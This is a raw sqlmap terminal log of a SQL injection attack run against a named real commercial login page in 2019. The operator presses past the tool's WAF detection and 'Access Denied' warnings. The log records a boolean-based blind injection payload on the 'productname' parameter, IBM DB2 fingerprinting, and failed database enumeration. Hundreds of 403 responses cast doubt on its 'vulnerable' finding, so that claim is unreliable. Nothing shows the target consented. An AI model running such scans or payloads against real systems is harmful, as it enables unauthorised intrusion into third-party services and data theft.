https://global.factiva.com/factivalogin/login.asp?productname=global
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.3.5.151#dev}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:54:34 /2019-06-11/

[?1049h[22;0;0t[1;24r(B[m[4l[?7h[24;1H[?1049l[23;0;0t[?1l>[17:54:35] [INFO] testing connection to the target URL
[17:54:35] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 302 redirect to 'http://global.factiva.com/en/cfg/notSupportedBrowser.asp'. Do you want to follow? [Y/n] Y
[17:54:35] [INFO] checking if the target is protected by some kind of WAF/IPS
[17:54:36] [CRITICAL] WAF/IPS identified as 'Kona Site Defender (Akamai Technologies)'
[17:54:36] [WARNING] potential permission problems detected ('Access Denied')
are you sure that you want to continue with further target testing? [Y/n] Y
[17:54:36] [WARNING] please consider usage of tamper scripts (option '--tamper')
[17:54:36] [INFO] testing if the target URL content is stable
[17:54:36] [WARNING] GET parameter 'productname' does not appear to be dynamic
[17:54:36] [WARNING] heuristic (basic) test shows that GET parameter 'productname' might not be injectable
[17:54:37] [INFO] testing for SQL injection on GET parameter 'productname'
[17:54:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:54:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[17:55:01] [INFO] GET parameter 'productname' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable 
[17:55:05] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'SQLite' 
it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[17:55:05] [INFO] testing 'SQLite inline queries'
[17:55:05] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[17:55:05] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
[17:55:05] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[17:55:05] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)'
[17:55:05] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query - comment)'
[17:55:05] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query - comment)'
[17:55:06] [INFO] testing 'SQLite > 2.0 time-based blind - Parameter replace (heavy query)'
[17:55:06] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:55:06] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:55:09] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[17:55:12] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[17:55:15] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[17:55:18] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[17:55:21] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[17:55:24] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[17:55:27] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[17:55:30] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[17:55:33] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[17:55:36] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[17:55:36] [INFO] checking if the injection point on GET parameter 'productname' is a false positive
GET parameter 'productname' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 368 HTTP(s) requests:
---
Parameter: productname (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: productname=-3009' OR 1696=1696-- Czew
---
[17:55:42] [INFO] testing SQLite
[17:55:43] [WARNING] the back-end DBMS is not SQLite
[17:55:43] [INFO] testing MySQL
[17:55:43] [WARNING] the back-end DBMS is not MySQL
[17:55:43] [INFO] testing Oracle
[17:55:43] [INFO] confirming Oracle
[17:55:43] [WARNING] the back-end DBMS is not Oracle
[17:55:43] [INFO] testing PostgreSQL
[17:55:44] [WARNING] the back-end DBMS is not PostgreSQL
[17:55:44] [INFO] testing Microsoft SQL Server
[17:55:44] [WARNING] the back-end DBMS is not Microsoft SQL Server
[17:55:44] [INFO] testing Microsoft Access
[17:55:44] [WARNING] the back-end DBMS is not Microsoft Access
[17:55:44] [INFO] testing Firebird
[17:55:44] [INFO] confirming Firebird
[17:55:45] [WARNING] the back-end DBMS is not Firebird
[17:55:45] [INFO] testing SAP MaxDB
[17:55:45] [WARNING] the back-end DBMS is not SAP MaxDB
[17:55:45] [INFO] testing Sybase
[17:55:45] [WARNING] the back-end DBMS is not Sybase
[17:55:45] [INFO] testing IBM DB2
[17:55:45] [INFO] confirming IBM DB2
[17:55:46] [INFO] the back-end DBMS is IBM DB2
back-end DBMS: IBM DB2
[17:55:46] [WARNING] schema names are going to be used on IBM DB2 for enumeration as the counterpart to database names on other DBMSes
[17:55:46] [INFO] fetching database (schema) names
[17:55:46] [INFO] fetching number of databases
[17:55:46] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[17:55:46] [INFO] retrieved: 
[17:55:46] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[17:55:46] [ERROR] unable to retrieve the number of databases
[17:55:46] [INFO] falling back to current database
[17:55:46] [INFO] fetching current database
[17:55:46] [INFO] retrieved: 
[17:56:05] [WARNING] on IBM DB2 you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[17:56:05] [CRITICAL] unable to retrieve the database names
[17:56:05] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 429 times
[17:56:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/global.factiva.com'

[*] ending @ 17:56:05 /2019-06-11/

